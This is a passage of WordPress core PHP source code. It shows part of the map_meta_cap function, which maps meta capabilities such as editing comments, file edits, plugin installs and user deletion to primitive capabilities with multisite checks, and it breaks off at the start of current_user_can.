ID. * @param int $user_id User ID. * @param string $cap Capability name. * @param array $caps User capabilities. */ $allowed = apply_filters( "auth_post_meta_{$meta_key}", false, $meta_key, $post->ID, $user_id, $cap, $caps ); if ( ! $allowed ) $caps[] = $cap; } elseif ( $meta_key && is_protected_meta( $meta_key, 'post' ) ) { $caps[] = $cap; } break; case 'edit_comment': $comment = get_comment( $args[0] ); if ( ! $comment ) { $caps[] = 'do_not_allow'; break; } $post = get_post( $comment->comment_post_ID ); /* * If the post doesn't exist, we have an orphaned comment. * Fall back to the edit_posts capability, instead. */ if ( $post ) { $caps = map_meta_cap( 'edit_post', $user_id, $post->ID ); } else { $caps = map_meta_cap( 'edit_posts', $user_id ); } break; case 'unfiltered_upload': if ( defined('ALLOW_UNFILTERED_UPLOADS') && ALLOW_UNFILTERED_UPLOADS && ( !is_multisite() || is_super_admin( $user_id ) ) ) $caps[] = $cap; else $caps[] = 'do_not_allow'; break; case 'unfiltered_html' : // Disallow unfiltered_html for all users, even admins and super admins. if ( defined( 'DISALLOW_UNFILTERED_HTML' ) && DISALLOW_UNFILTERED_HTML ) $caps[] = 'do_not_allow'; elseif ( is_multisite() && ! is_super_admin( $user_id ) ) $caps[] = 'do_not_allow'; else $caps[] = $cap; break; case 'edit_files': case 'edit_plugins': case 'edit_themes': // Disallow the file editors. if ( defined( 'DISALLOW_FILE_EDIT' ) && DISALLOW_FILE_EDIT ) $caps[] = 'do_not_allow'; elseif ( defined( 'DISALLOW_FILE_MODS' ) && DISALLOW_FILE_MODS ) $caps[] = 'do_not_allow'; elseif ( is_multisite() && ! is_super_admin( $user_id ) ) $caps[] = 'do_not_allow'; else $caps[] = $cap; break; case 'update_plugins': case 'delete_plugins': case 'install_plugins': case 'upload_plugins': case 'update_themes': case 'delete_themes': case 'install_themes': case 'upload_themes': case 'update_core': // Disallow anything that creates, deletes, or updates core, plugin, or theme files. // Files in uploads are excepted. if ( defined( 'DISALLOW_FILE_MODS' ) && DISALLOW_FILE_MODS ) { $caps[] = 'do_not_allow'; } elseif ( is_multisite() && ! is_super_admin( $user_id ) ) { $caps[] = 'do_not_allow'; } elseif ( 'upload_themes' === $cap ) { $caps[] = 'install_themes'; } elseif ( 'upload_plugins' === $cap ) { $caps[] = 'install_plugins'; } else { $caps[] = $cap; } break; case 'activate_plugins': $caps[] = $cap; if ( is_multisite() ) { // update_, install_, and delete_ are handled above with is_super_admin(). $menu_perms = get_site_option( 'menu_items', array() ); if ( empty( $menu_perms['plugins'] ) ) $caps[] = 'manage_network_plugins'; } break; case 'delete_user': case 'delete_users': // If multisite only super admins can delete users. if ( is_multisite() && ! is_super_admin( $user_id ) ) $caps[] = 'do_not_allow'; else $caps[] = 'delete_users'; // delete_user maps to delete_users. break; case 'create_users': if ( !is_multisite() ) $caps[] = $cap; elseif ( is_super_admin( $user_id ) || get_site_option( 'add_new_users' ) ) $caps[] = $cap; else $caps[] = 'do_not_allow'; break; case 'manage_links' : if ( get_option( 'link_manager_enabled' ) ) $caps[] = $cap; else $caps[] = 'do_not_allow'; break; case 'customize' : $caps[] = 'edit_theme_options'; break; case 'delete_site': $caps[] = 'manage_options'; break; default: // Handle meta capabilities for custom post types. $post_type_meta_caps = _post_type_meta_capabilities(); if ( isset( $post_type_meta_caps[ $cap ] ) ) { $args = array_merge( array( $post_type_meta_caps[ $cap ], $user_id ), $args ); return call_user_func_array( 'map_meta_cap', $args ); } // If no meta caps match, return the original cap. $caps[] = $cap; } /** * Filter a user's capabilities depending on specific context and/or privilege. * * @since 2.8.0 * * @param array $caps Returns the user's actual capabilities. * @param string $cap Capability name. * @param int $user_id The user ID. * @param array $args Adds the context to the cap. Typically the object ID. */ return apply_filters( 'map_meta_cap', $caps, $cap, $user_id, $args ); } /** * Whether the current user has a specific capability. * * While checking against particular roles in place of a capability is supported * in part, this practice is discouraged as it may produce unreliable results. * * @since 2.0.0 * * @see WP_User::has_cap() * @see map_meta_cap() * * @param string $capability Capability name. * @param int $object_id Optional. ID of the specific object to check against if `$capability` is a "meta" cap. * "Meta" capabilities, e.g. 'edit_post', 'edit_user', etc., are capabilities used * by map_meta_cap() to map to other "primitive" capabilities, e.g. 'edit_posts', * 'edit_others_posts', etc. Accessed via func_get_args() and passed to WP_User::has_cap(), * then map_meta_cap(). * @return bool Whether the current user has the given capability. If `$capability` is a meta cap and `$object_id` is * passed, whether the current user has the given meta capability for the given object. */ function current_user_can( $capability ) { $current_user = wp_get_current_user(); if ( empty( $current_user ) ) return false; $args = array_slice( fun